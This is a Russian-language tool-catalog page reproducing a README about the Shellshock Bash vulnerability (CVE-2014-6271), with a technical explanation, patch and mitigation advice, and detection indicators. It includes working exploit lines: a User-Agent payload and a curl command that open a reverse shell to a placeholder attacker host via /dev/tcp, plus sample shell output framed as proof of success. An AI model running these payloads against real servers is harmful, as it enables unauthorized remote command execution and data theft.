Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2014-6271 — CVE-2014-6271 | Kitploit
Инструменты/GitHubGitHub/0xblackash/cve-2014-6271
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийКомандование и УправлениеСтатьи и ИсследованияОбучение и Образование
GitHub0xblackash/cve-2014-6271

CVE-2014-6271

CVE-2014-6271

Репозиторий
56 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 CVE-2014-6271 — «Shellshock»

shellshock

25-летний zero-day с удалённым выполнением кода в GNU Bash через переменные окружения

Severity CVSS Affected Patched


📖 Обзор

CVE-2014-6271, известная как Shellshock (также Bashdoor), — это критическая уязвимость удалённого выполнения кода (RCE) в оболочке GNU Bash.
Злоумышленник может отправить специально сформированные переменные окружения (через HTTP-заголовки, DHCP, SSH и т.д.) и получить удалённый доступ к оболочке на сервере — часто без аутентификации и при минимальном взаимодействии с пользователем.


🧠 Краткое описание уязвимости


⚙️ Технические детали

📨 Шаг 1 — Вредоносная переменная окружения

Злоумышленник внедряет специально созданную переменную (например, в заголовок User-Agent):

root@kitploit:~
() { :; }; /bin/bash -i >& /dev/tcp/attacker-ip/4444 0>&1

🧩 Шаг 2 — Ошибка парсинга функций в Bash

Bash ошибочно воспринимает полезную нагрузку как определение функции с последующими командами. Код после (); выполняется сразу при импорте переменной.

💣 Шаг 3 — Удалённое выполнение

Команда выполняется с правами веб-сервера/процесса (часто root или www-data).

Результат:

root@kitploit:~
# Удалённый доступ к оболочке получен
whoami
www-data

✅ Если операция прошла успешно, вот ТОЧНО, что вы увидите (пошагово):

shellshock

1. В вашем терминале (сразу после запуска PoC)

root@kitploit:~
✅ Уязвим! (Shellshock RCE сработал)
vulnerable
test

Вы также увидите, что обратный шелл подключился мгновенно.

2. При запуске команды обнаружения

root@kitploit:~
env x='() { :;}; echo vulnerable' bash -c "echo test"

Она сразу вернёт:

root@kitploit:~
vulnerable
test

(Это подтверждает, что Bash выполнил внедрённую команду.)

3. Настоящее доказательство успеха — в вашем браузере или curl (момент, когда вы понимаете, что у вас полный RCE)

Выполните curl против уязвимого CGI-скрипта Apache:

root@kitploit:~
curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/YOUR-IP/4444 0>&1" http://vulnerable-server/cgi-bin/test.sh

Вы увидите этот точный вывод в вашем netcat-слушателе:

root@kitploit:~
bash: no job control in this shell
www-data@server:/var/www$ whoami
www-data
www-data@server:/var/www$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@server:/var/www$ ls -la
total 12
drwxr-xr-x 2 www-data www-data 4096 Sep 24 14:00 .
...

Этот вывод появляется напрямую в вашем обратном шелле. Ни ошибок, ни 404.
Это означает, что у вас полный удалённый доступ к выполнению команд на сервере — внедрение переменной окружения сработало идеально.


🎯 Почему это опасно

  • ⚡ 25-летний zero-day (существовал с 1989 года)
  • 🌐 Чрезвычайно широкая поверхность атаки (CGI, DHCP, SSH, OpenVPN, CUPS…)
  • 🔓 Во многих распространённых векторах не требуется аутентификация
  • 🧨 Полный RCE
  • 📂 Возможность кражи данных и точки входа для программ-вымогателей
  • 🔁 Возможность распространения в больших сетях (wormable)

📦 Уязвимые версии

Все версии GNU Bash:

root@kitploit:~
1.14 – 4.3 (до уровня исправления 30)

(включая Linux, macOS, BSD, встроенные устройства)


✅ Исправленная версия

Немедленно обновитесь до:

root@kitploit:~
Bash 4.3, уровень исправления 30 или новее (рекомендуется 4.4+)

🛡️ Шаги по снижению риска

1️⃣ Немедленные действия

  • Обновите Bash на ВСЕХ системах:
    root@kitploit:~
    # Ubuntu/Debian
    apt update && apt install --only-upgrade bash
    
    # Red Hat/CentOS
    yum update bash
    

2️⃣ Усиление защиты веб-сервера

  • Отключите CGI/mod_cgi, где возможно
  • Используйте правила mod_security для блокировки () {
  • Ограничьте передачу переменных окружения

3️⃣ Мониторинг логов

Ищите:

  • Подозрительные User-Agent / Referer, содержащие () {
  • Неожиданные обратные шеллы или исходящие соединения
  • Запуск дочерних процессов Bash из веб-сервисов

🔍 Советы по обнаружению

Индикаторы компрометации могут включать:

  • Логи, содержащие () { :;};
  • Неожиданные файлы, созданные пользователем веб-сервера
  • Исходящие соединения на высоких портах
  • Запуск веб-сервером /bin/bash -i

🧪 Proof-of-Concept (концептуальный)

root@kitploit:~
Вредоносный заголовок/DHCP/SSH → Bash импортирует переменную окружения
        ↓
Определение функции + хвостовые команды выполняются
        ↓
Произвольная команда / обратный шелл

📌 Связанная уязвимость

Эта проблема привела к нескольким последующим CVE (неполные исправления):

  • CVE-2014-7169 (AfterShock)
  • CVE-2014-6277 / CVE-2014-6278
  • CVE-2014-7186 / CVE-2014-7187

📊 Оценка воздействия

Область рискаВоздействие
Конфиденциальность🔴 Высокое
Целостность🔴 Высокое
Доступность🔴 Высокое

🧩 Уроки

  • Никогда не доверяйте переменным окружения
  • Парсинг функций в оболочках должен быть чрезвычайно строгим
  • Долгоживущие ошибки в основных компонентах системы катастрофичны
  • Одного исправления недостаточно — нужно уменьшать поверхность атаки

📚 Ссылки

  • NVD – CVE-2014-6271
  • Wikipedia – Shellshock
  • Red Hat Security Blog
  • Qualys Technical Analysis
  • CISA Alert TA14-268A

🚨 Окончательная рекомендация

Если вы запускаете любой Linux/macOS/BSD сервер в 2026 году: 🔥 Немедленно исправьте Bash (даже на изолированных системах). 💡 Считайте, что сервер скомпрометирован, если работал незапатченный Bash, доступный из интернета. 🛡 Проведите полный анализ логов и проверку целостности.

Скачать инструмент
ПолеЗначение
CVE IDCVE-2014-6271
Степень опасности🔴 Критическая
CVSS10.0 (максимум)
Вектор атакиУдалённый (HTTP, DHCP, SSH и т.д.)
Необходимость аутентификации❌ Не требуется (во многих векторах)
Взаимодействие пользователя❌ Не требуется (в случаях CGI/DHCP)
ВоздействиеПолная компрометация сервера